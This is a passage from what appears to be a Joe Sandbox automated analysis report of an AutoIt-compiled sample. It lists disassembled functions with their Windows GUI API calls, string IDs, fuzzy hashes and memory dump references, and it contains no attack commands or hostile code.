                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: 0
                                                                      • API String ID: 2326795674-4108050209
                                                                      • Opcode ID: 4017dd47b9f0e23679571475a3ab751361663223875255cc36d6c3bb33d8ede3
                                                                      • Instruction ID: 40e5cbbba750320cc2e08b759ee73024d29449bbe59a99961c9f2d86a5b4c8d3
                                                                      • Opcode Fuzzy Hash: 4017dd47b9f0e23679571475a3ab751361663223875255cc36d6c3bb33d8ede3
                                                                      • Instruction Fuzzy Hash: 3C02D070104301AFEB25CF28C889BAABFE9FF89314F04492DF995D62A1D735D944DB92
                                                                      Function 0059A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 0059A903
                                                                      • SetTextColor.GDI32(?,?), ref: 0059A907
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0059A91D
                                                                      • GetSysColor.USER32(0000000F), ref: 0059A928
                                                                      • CreateSolidBrush.GDI32(?), ref: 0059A92D
                                                                      • GetSysColor.USER32(00000011), ref: 0059A945
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059A953
                                                                      • SelectObject.GDI32(?,00000000), ref: 0059A964
                                                                      • SetBkColor.GDI32(?,00000000), ref: 0059A96D
                                                                      • SelectObject.GDI32(?,?), ref: 0059A97A
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0059A999
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059A9B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0059A9C5
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059A9ED
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0059AA14
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0059AA32
                                                                      • DrawFocusRect.USER32(?,?), ref: 0059AA3D
                                                                      • GetSysColor.USER32(00000011), ref: 0059AA4B
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0059AA53
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0059AA67
                                                                      • SelectObject.GDI32(?,0059A5FA), ref: 0059AA7E
                                                                      • DeleteObject.GDI32(?), ref: 0059AA89
                                                                      • SelectObject.GDI32(?,?), ref: 0059AA8F
                                                                      • DeleteObject.GDI32(?), ref: 0059AA94
                                                                      • SetTextColor.GDI32(?,?), ref: 0059AA9A
                                                                      • SetBkColor.GDI32(?,?), ref: 0059AAA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 07a942c4a1bb0626118de044e40941c47ac1874524bf01b4cc7ec6cdf392e4b9
                                                                      • Instruction ID: 0537cddc5cfe3d7fffd8a87b732aeea07ddfc0f19af221e7aed26b3c9b6dedc7
                                                                      • Opcode Fuzzy Hash: 07a942c4a1bb0626118de044e40941c47ac1874524bf01b4cc7ec6cdf392e4b9
                                                                      • Instruction Fuzzy Hash: 67511D71900218EFDF119FA4DC48EAE7BB9FB48320F124526F911EB2A1D7759944EBA0
                                                                      Function 005989D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00598AC1
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598AD2
                                                                      • CharNextW.USER32(0000014E), ref: 00598B01
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00598B42
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00598B58
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598B69
                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00598B86
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00598BD8
                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00598BEE
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00598C1F
                                                                      • _memset.LIBCMT ref: 00598C44
                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00598C8D
                                                                      • _memset.LIBCMT ref: 00598CEC
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00598D16
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00598D6E
                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00598E1B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00598E3D
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00598E87
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00598EB4
                                                                      • DrawMenuBar.USER32(?), ref: 00598EC3
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00598EEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                      • String ID: 0
                                                                      • API String ID: 1073566785-4108050209
                                                                      • Opcode ID: 3d737072fb9ce3db37eb05b08a5d4406c94bc69398bd528e0e8ef1940bc12020
                                                                      • Instruction ID: b60cd2fd26b924a85728492940d9e5663082ce81d613487b3049cc7c1e37f46e
                                                                      • Opcode Fuzzy Hash: 3d737072fb9ce3db37eb05b08a5d4406c94bc69398bd528e0e8ef1940bc12020
                                                                      • Instruction Fuzzy Hash: F1E16E71900219ABDF209F64CC88EFE7FB9FF46720F148156F915AA290DB749A84DF60
                                                                      Function 0059488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 005949CA
                                                                      • GetDesktopWindow.USER32 ref: 005949DF
                                                                      • GetWindowRect.USER32(00000000), ref: 005949E6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00594A48
                                                                      • DestroyWindow.USER32(?), ref: 00594A74
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00594A9D
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00594ABB
                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00594AE1
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00594AF6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00594B09
                                                                      • IsWindowVisible.USER32(?), ref: 00594B29
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00594B44
                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00594B58
                                                                      • GetWindowRect.USER32(?,?), ref: 00594B70
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00594B96
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00594BB0
                                                                      • CopyRect.USER32(?,?), ref: 00594BC7
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00594C32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 5c013feeae9d8b7787d09a316746b4b184f3ec7922290c2c7de683d5e7d3ec4a
                                                                      • Instruction ID: e25aa95d3f1e695a226b398b5c3c5fb4cd3a056274a44ac5032af62e67fef447
                                                                      • Opcode Fuzzy Hash: 5c013feeae9d8b7787d09a316746b4b184f3ec7922290c2c7de683d5e7d3ec4a
                                                                      • Instruction Fuzzy Hash: 60B16871608341AFDB04DF64C848F6ABBE5BB88314F008A19F5999B2A1DB71EC46CF95
                                                                      Function 0057449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005744AC
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005744D2
                                                                      • _wcscpy.LIBCMT ref: 00574500
                                                                      • _wcscmp.LIBCMT ref: 0057450B
                                                                      • _wcscat.LIBCMT ref: 00574521
                                                                      • _wcsstr.LIBCMT ref: 0057452C
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00574548
                                                                      • _wcscat.LIBCMT ref: 00574591
                                                                      • _wcscat.LIBCMT ref: 00574598
                                                                      • _wcsncpy.LIBCMT ref: 005745C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 699586101-1459072770
                                                                      • Opcode ID: c3a065299e4c167072da1233d7ea21a6c1a6f26b0dec4762ab237cf383e83f1d
                                                                      • Instruction ID: e0840dae606a60d9be12215db32156f9ddcc9481b5eb160956cb059d8bc1d950
                                                                      • Opcode Fuzzy Hash: c3a065299e4c167072da1233d7ea21a6c1a6f26b0dec4762ab237cf383e83f1d
                                                                      • Instruction Fuzzy Hash: 7D41FB326002117BDB11BB749C4BEBF7FACFF91710F14446AF905E6182EB359901A7A5
                                                                      Function 005127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005128BC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 005128C4
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005128EF
                                                                      • GetSystemMetrics.USER32(00000008), ref: 005128F7
                                                                      • GetSystemMetrics.USER32(00000004), ref: 0051291C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00512939
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00512949
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0051297C
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00512990
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 005129AE
                                                                      • GetStockObject.GDI32(00000011), ref: 005129CA
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 005129D5
                                                                        • Part of subcall function 00512344: GetCursorPos.USER32(?), ref: 00512357
                                                                        • Part of subcall function 00512344: ScreenToClient.USER32(005D57B0,?), ref: 00512374
                                                                        • Part of subcall function 00512344: GetAsyncKeyState.USER32(00000001), ref: 00512399
                                                                        • Part of subcall function 00512344: GetAsyncKeyState.USER32(00000002), ref: 005123A7
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00511256), ref: 005129FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 134222fe381f5a1f7e3537485eda1ba4bf806e690fe5b72fa7e3c31bc54375f4
                                                                      • Instruction ID: f302f3dd2a10271319767ac00d9e56940be8946489c960464b00068461474276
                                                                      • Opcode Fuzzy Hash: 134222fe381f5a1f7e3537485eda1ba4bf806e690fe5b72fa7e3c31bc54375f4
                                                                      • Instruction Fuzzy Hash: C7B18D7160120AEFEB14DFA8CC49BED7FB4FB58315F21412AFA15E6290DB749890DB50
                                                                      Function 0056A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0056A47A
                                                                      • __swprintf.LIBCMT ref: 0056A51B
                                                                      • _wcscmp.LIBCMT ref: 0056A52E
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0056A583
                                                                      • _wcscmp.LIBCMT ref: 0056A5BF
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0056A5F6
                                                                      • GetDlgCtrlID.USER32(?), ref: 0056A648
                                                                      • GetWindowRect.USER32(?,?), ref: 0056A67E
                                                                      • GetParent.USER32(?), ref: 0056A69C
                                                                      • ScreenToClient.USER32(00000000), ref: 0056A6A3
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0056A71D
                                                                      • _wcscmp.LIBCMT ref: 0056A731
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0056A757
                                                                      • _wcscmp.LIBCMT ref: 0056A76B
                                                                        • Part of subcall function 0053362C: _iswctype.LIBCMT ref: 00533634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                      • String ID: %s%u
                                                                      • API String ID: 3744389584-679674701
                                                                      • Opcode ID: 804653d047074758e1543a659cf3cc1b12cb853370d268efc1475083886af935
                                                                      • Instruction ID: aa491163e630bd83360be91c26c8064d457f2843be1a0ebade56c135031d8be9
                                                                      • Opcode Fuzzy Hash: 804653d047074758e1543a659cf3cc1b12cb853370d268efc1475083886af935
                                                                      • Instruction Fuzzy Hash: 5AA1D271204706AFDB14DF64C888BAABBE8FF54355F008529F99AE3190DB30E955CF92
                                                                      Function 0056AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0056AF18
                                                                      • _wcscmp.LIBCMT ref: 0056AF29
                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0056AF51
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0056AF6E
                                                                      • _wcscmp.LIBCMT ref: 0056AF8C
                                                                      • _wcsstr.LIBCMT ref: 0056AF9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0056AFD5
                                                                      • _wcscmp.LIBCMT ref: 0056AFE5
                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0056B00C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0056B055
                                                                      • _wcscmp.LIBCMT ref: 0056B065
                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0056B08D
                                                                      • GetWindowRect.USER32(00000004,?), ref: 0056B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                      • String ID: @$ThumbnailClass
                                                                      • API String ID: 1788623398-1539354611
                                                                      • Opcode ID: 5e21e8c8578e03fa5a4d16132e0cdbc4d770f1301890ceae8c5b9732e4dfa54b
                                                                      • Instruction ID: 1446be0746ad02e8002dc79e40fb18cbcefabc5ce0900d79c6a8b99e16edc25b
                                                                      • Opcode Fuzzy Hash: 5e21e8c8578e03fa5a4d16132e0cdbc4d770f1301890ceae8c5b9732e4dfa54b
                                                                      • Instruction Fuzzy Hash: 7C818071108206ABEB05DF14C885BAABFE8FF94314F04846AFD85DB095DB34DD89CB62
                                                                      Function 0059C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0059C627
                                                                        • Part of subcall function 0059AB37: ClientToScreen.USER32(?,?), ref: 0059AB60
                                                                        • Part of subcall function 0059AB37: GetWindowRect.USER32(?,?), ref: 0059ABD6
                                                                        • Part of subcall function 0059AB37: PtInRect.USER32(?,?,0059C014), ref: 0059ABE6
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0059C690
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0059C69B
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0059C6BE
                                                                      • _wcscat.LIBCMT ref: 0059C6EE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0059C705
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0059C71E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0059C735
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0059C757
                                                                      • DragFinish.SHELL32(?), ref: 0059C75E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0059C851
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb]
                                                                      • API String ID: 169749273-2364637008
                                                                      • Opcode ID: 4787128e05bc791460c4ea9971393f673e44a817bcce299e713c8d840e053163
                                                                      • Instruction ID: 3e51c971e528f8d6853d85dc10cefb7b8f4505cea2fff9371f8462aa66633739
                                                                      • Opcode Fuzzy Hash: 4787128e05bc791460c4ea9971393f673e44a817bcce299e713c8d840e053163
                                                                      • Instruction Fuzzy Hash: 9A615971108301AFDB01EF64D889DABBFE8FFD9750F10092EF595921A1DB309A49DB92
                                                                      Function 0056ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                      • API String ID: 1038674560-1810252412
                                                                      • Opcode ID: ebd51728a6cea8b4544ca0522dfdaade7338aab1bdefdfda13119b6e437a1ac7
                                                                      • Instruction ID: 76595a21e78da609682353a10f61a4c07372cd879ad31dee4a614f0aa94d8c8a
                                                                      • Opcode Fuzzy Hash: ebd51728a6cea8b4544ca0522dfdaade7338aab1bdefdfda13119b6e437a1ac7
                                                                      • Instruction Fuzzy Hash: 4A31613198820EAAEB14EA94DD0BFEE7F74BB58710F600419B401724D1FF616F44CE52
                                                                      Function 00584FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00585013
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0058501E
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00585029
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00585034
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0058503F
                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0058504A
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00585055
                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00585060
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0058506B
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00585076
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00585081
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0058508C
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00585097
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 005850A2
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 005850AD
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 005850B8
                                                                      • GetCursorInfo.USER32(?), ref: 005850C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$Info
                                                                      • String ID:
                                                                      • API String ID: 2577412497-0
                                                                      • Opcode ID: 518b3aa61c5bdfc03e9113e449fce5d5ade81b04bf24836a68bd6f9c79d526f7
                                                                      • Instruction ID: dd97a70a2f5e78c303319281e45bd0cb44a1510b0d526974459624b2eef2e04d
                                                                      • Opcode Fuzzy Hash: 518b3aa61c5bdfc03e9113e449fce5d5ade81b04bf24836a68bd6f9c79d526f7
                                                                      • Instruction Fuzzy Hash: 8431E3B1D4831AAADF109FB68C8999EBFE8FB04750F50452AA54DE7280EA786504CF91
                                                                      Function 0059A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0059A259
                                                                      • DestroyWindow.USER32(?,?), ref: 0059A2D3
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A34D
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A36F
